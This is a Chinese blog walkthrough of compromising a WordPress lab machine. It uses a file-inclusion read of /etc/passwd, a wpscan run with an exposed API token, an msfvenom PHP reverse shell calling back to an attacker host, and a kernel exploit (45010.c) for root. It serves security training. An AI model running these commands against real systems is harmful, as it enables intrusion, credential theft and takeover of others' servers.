2024-Wordpress的渗透记录

admin 2024年10月18日21:50:00评论12 views字数 1230阅读4分6秒阅读模式

Wordpress的渗透记录

声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者和此公众号不为此承担任何责任。

一、启动靶场

2024-Wordpress的渗透记录

2024-Wordpress的渗透记录

二、靶场渗透

Nmap -sn 192.168.126.0/24    

2024-Wordpress的渗透记录

Nmap -sV -sC -p- 192.168.126.139

2024-Wordpress的渗透记录

发现了2个端口一个22一个80就很简单了,访问80端口

2024-Wordpress的渗透记录

话不多说,目录扫描    

Dord http://192.168.126.139 -X .txt,.php,.rar,.zip,.tar

2024-Wordpress的渗透记录

发现三个目录,在secret.txt发现了

2024-Wordpress的渗透记录

2024-Wordpress的渗透记录

那么我们就尝试查看这个location.txt    

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hl 7 -u http://192.168.126.139/index.php?FUZZ=location.txt

使用fuzz模糊匹配来爆破

2024-Wordpress的渗透记录

发现是file那么我们读取一下

2024-Wordpress的渗透记录

让我们使用secrettier360

2024-Wordpress的渗透记录

没反应换一个image.Php    

2024-Wordpress的渗透记录

成功读取了/etc/passwd

2024-Wordpress的渗透记录

有一句提示

find password.txt file in my directory:/home/saket,那么我们读取一下

2024-Wordpress的渗透记录

记录一下有可能是密码,但是我们现在的一个问题是我们没有用户名

那么我们在来扫描一下目录,刚刚只是扫描了文件,现在扫目录    

2024-Wordpress的渗透记录

发现了wordpress的目录访问一下

2024-Wordpress的渗透记录

发现是一个wordpress的网站,那么上工具wpscan

wpscan --url http://192.168.126.139/wordpress/ -e u --api-token 3PI8b5JDOnqJLSZQ9ShsQpx5qmOdDT5ahPEP1pX53Zs

2024-Wordpress的渗透记录

发现了一个用户victor,又有了密码,尝试一下    

2024-Wordpress的渗透记录

密码不行,那么就换思路,在目录扫描的时候我们还发现了一个登陆页面

2024-Wordpress的渗透记录

2024-Wordpress的渗透记录

登陆进来    

2024-Wordpress的渗透记录

找到了一个可以写入的php编辑器,那么我们就弄一个反链就可以了

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.48.130 lport=4444 -o shell.php

2024-Wordpress的渗透记录

生成成功    

2024-Wordpress的渗透记录

更新之后使用msfconsole来连接

2024-Wordpress的渗透记录

那么路径在哪

2024-Wordpress的渗透记录    

2024-Wordpress的渗透记录

反链成功

指令:

Python -c ‘import pyt;pty.spawn(“/bin/bash”)’

find / -perm -u=s -type f 2>/dev/null

Sudo -l

2024-Wordpress的渗透记录

又发现了一个密码,看看是不是呢    

2024-Wordpress的渗透记录

密码不对,那么就看看内核提权了

2024-Wordpress的渗透记录

尝试了很多只有这个45010.c可以提权

upload /usr/share/exploitdb/exploits/linux/local/45010.c /tmp/45010.c

上传文件之后加权限gcc编译一下,执行就可以完成提权

2024-Wordpress的渗透记录    

原文始发于微信公众号(攻防学堂):2024-Wordpress的渗透记录

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月18日21:50:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2024-Wordpress的渗透记录https://cn-sec.com/archives/3287203.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息